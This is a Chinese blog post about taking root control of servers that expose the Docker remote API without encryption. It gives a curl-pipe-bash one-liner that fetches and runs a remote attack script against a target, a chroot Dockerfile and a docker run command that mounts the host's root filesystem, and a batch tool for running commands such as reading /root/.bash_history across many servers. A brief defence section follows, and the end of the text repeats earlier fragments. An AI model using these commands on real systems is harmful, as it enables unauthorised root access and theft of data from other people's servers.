一个回车键黑掉一台服务器 - 晨曦的记忆,乐意数据

不说废话真的一个回车键：



    
        curl -sSL https://git.io/vXNB4 | bash -s test <addr:port>

自己替换<addr:port>的内容，下面是原理与批量扫描测试。

首先我不是什么黑客，也不是什么白帽子，我甚至从未踏进那个圈子，但是前几天闲来无事扫了一下网络上开放的Docker API端口，发现互联网上存在着大量未使用加密传输、直接开放Docker远程API端口的服务器，这些端口允许任何人连接到服务器并使用Docker。

而众所周知，docker这个用户组拥有与root用户基本一样的权限，这意味着我们可以通过这些端口获取服务器的最高权限。

本文代码：https://github.com/izuolan/docker-root-shell
如果你用这个玩意拿到了最高权限也别乱动别人服务器啦～～心疼运维一秒钟～～

一、原理演示

本节是在本地做的一个演示，我才不搞事，笑。先安装Docker，没什么好说的。

1.开启socket

为了更好地演示Docker远程API，我们首先要设置一下本地的Docker daemon启动参数，使其开启socket端口用于返回信息。

根据不同的发行版（这里以Linux为例），开启socket的方式也有不同。

简单来说，使用service命令管理服务的发行版（例如Ubuntu 14.04）可以直接通过修改/etc/default/docker这个文件就可以开启socket：



    
        # Docker Upstart and SysVinit configuration file 
    

    
        # 
    

    
        # THIS FILE DOES NOT APPLY TO SYSTEMD 
    

    
        # 
    

    
        #   Please see the documentation for "systemd drop-ins": 
    

    
        #   https://docs.docker.com/engine/articles/systemd/ 
    

    
        # 
    

    
        # Customize location of Docker binary (especially for development testing). 
    

    
        #DOCKERD="/usr/local/bin/dockerd" 
    

    
        # Use DOCKER_OPTS to modify the daemon startup options. 
    

    
        #DOCKER_OPTS="--dns 8.8.8.8 --dns 8.8.4.4" 
    

    
        # 修改下面 
    

    
        DOCKER_OPTS="-H tcp://0.0.0.0:2333 -H unix:///var/run/docker.sock" 
    

    
        # If you need Docker to use an HTTP proxy, it can also be specified here. 
    

    
        #export http_proxy="http://127.0.0.1:3128/" 
    

    
        # This is also a handy place to tweak where Docker's temporary files go. 
    

    
        #export TMPDIR="/mnt/bigdrive/docker-tmp"

然后保存重启Docker：



    
        $ service docker restart

现在你可以使用curl等工具访问本地Docker daemon了。
至于使用systemd管理系统服务的发行版版（例如Ubuntu 16.04），需要在/etc/systemd/system/文件夹中操作，具体如下：
创建文件夹：



    
        $ sudo mkdir /etc/systemd/system/docker.service.d/

新建配置文件，内容如下：



    
        $ sudo vim /etc/systemd/system/docker.service.d/remote-api.conf 
    

    
        [Service] 
    

    
        ExecStart= 
    

    
        ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2333 -H unix:///var/run/docker.sock

注意，ExecStart要输入两次。保存然后重新加载systemd配置并重启Docker：



    
        $ systemctl daemon-reload 
    

    
        $ systemctl restart docker

现在任何人都可以通过docker -H "tcp://<我电脑IP>:<2333>"来执行操作控制我电脑上的Docker，例如docker -H "tcp://<我电脑IP>:<2333>" images查看我电脑上的全部镜像。

2.构建入侵镜像

现在任何人都可以连接到我电脑上的Docker API接口并操作我电脑上的Docker，但是为了获取电脑的Root权限我们还需要一个特殊的镜像，通过这个镜像获取系统最高权限。
镜像Dockerfile非常简单：



    
        FROM busybox 
    

    
        CMD ["chroot","/host_dir","/bin/sh"]

纳尼？就两句话？嗯，准确来说就一句话，通过chroot切换为root的执行环境，chroot这个工具的作用就是Change Root，也就是改变程序执行时所参考的根目录位置。
使用



    
        docker build -t anony/mous .

这样就获得了一个入侵镜像。才几百KB的镜像远程传输起来非常方便。

3.获取系统最高权限

现在到了最后一步，没有什么复杂的操作，我们要的只是运行容器：



    
        docker -H tcp://<被入侵IP>:<API的端口> \ 
    

    
         run -v /:/host_dir \ 
    

    
         --name anonymous \ 
    

    
         --rm -it anony/mous

这个命令大概都能看懂吧，就是把被入侵的主机的根目录/挂载到容器的host_dir目录，然后容器启动时执行chroot /host_dir /bin/sh。
这样就获得了被入侵机器的最高权限。现在执行任何操作都是与主机root用户执行的一样。已经没有什么可以阻挡你了。

二、批量测试

原理解释完，我们来看如何批量测试互联网空间上这些未加密的服务器。周末花了点时间写了个脚本，用于测试批量服务器。

1.一个回车键的事

还记得标题说的一个回车键黑掉一台服务器吗？就是下面这句话了，一个回车键你就可以获得对应服务器的最高权限。



    
        curl -sSL https://git.io/vXNB4 | bash -s test <addr:port>

2.批量测试管理

好吧，脚本写着写着就歪楼了，本来是批量测试的脚本变成了集测试、管理于一体的脚本。目前已经集成了如下功能：

快速连接一台服务器
对一台或批量服务器执行命令
添加服务器到列表
从列表删除服务器
测试一台或批量服务器的延迟
测试服务器是否开放了Docker Remote API端口
远程执行Docker命令

Docker Root Shell

1.直接执行该脚本可以查看服务器列表



    
        $ ./docker-root-shell.sh 
    

    
        ========================================================================== 
    

    
         Num - Alias - Address Port - CPU Mem - Note 
    

    
        ========================================================================== 
    

    
         1 - wo - 172.16.8.247 2376 - 8 Cu 8 GB - Work 
    

    
         2 - ol - 172.16.158.90 2376 - 8 Cu 8 GB - Online 
    

    
         ... ...

2.连接到服务器



    
        # 使用别名快速连接到一台服务器 
    

    
        $ ./docker-root-shell.sh con wo

3.对一台或批量服务器执行命令



    
        # 对一台服务器执行命令，指定别名 
    

    
        $ ./docker-root-shell.sh run wo "cat /root/.bash_history"



    
        # 对批量服务器执行命令，使用all 
    

    
        $ ./docker-root-shell.sh run all "cat /etc/hosts"

4.添加一台服务器到列表中



    
        # 别名：地址：端口：CPU：内存：备注 
    

    
        # <>表示必填，[]表示选填，别名不能是纯数字 
    

    
        ./docker-root-shell.sh add <alias>:<addr>:<port>:[cpu]:[ram]:[note] 
    

    
        ./docker-root-shell.sh add wo2:172.16.168.233:6666

5.从列表中删除一台服务器



    
        ./docker-root-shell.sh del <alias> 
    

    
        ./docker-root-shell.sh del wo2

6.测试服务器延迟



    
        # 测试全部服务器的延迟 
    

    
        # 输入一个数字，表示每台服务器的发包数量，会输出平均延迟 
    

    
        ./docker-root-shell.sh ping <count> 
    

    
        ./docker-root-shell.sh ping 1



    
        # 测试一台服务器的延迟只需要指定别名即可 
    

    
        ./docker-root-shell.sh ping <alias> 
    

    
        ./docker-root-shell.sh ping wo2

7.使用Docker Client远程操作Docker



    
        # 没什么好说的，指定别名，该干嘛干嘛 
    

    
        ./docker-root-shell.sh docker <alias> <docker subcommand> 
    

    
        ./docker-root-shell.sh docker wo2 images

8.编辑服务器列表



    
        # 需要调整一下就使用这玩意吧，默认编辑器在脚本头部可以设定。 
    

    
        ./docker-root-shell.sh edit

三、如何防御

最简单的，如果你需要用第三方工具使用Docker API，但是不需要远程控制，把tcp端口绑定在127.0.0.1就好啦，例如-H "tcp://127.0.0.1:2333"，但是如果你要远程使用Docker API，那么还是老实加密吧。

如何加密传输？官方文档很清楚写着了啊～～
https://docs.docker.com/engine/security/https/

总而言之，这种人为漏洞就尽可能避免啦，别偷懒，乖乖♂使用加密。

-root-shell.sh docker <alias> <docker subcommand> ./docker-root-shell.sh docker wo2 images

8.编辑服务器列表



    
        # 需要调整一下就使用这玩意吧，默认编辑器在脚本头部可以设定。 
    

    
        ./docker-root-shell.sh edit

三、如何防御

如何加密传输？官方文档很清楚写着了啊～～
https://docs.docker.com/engine/security/https/

总而言之，这种人为漏洞就尽可能避免啦，别偷懒，乖乖♂使用加密。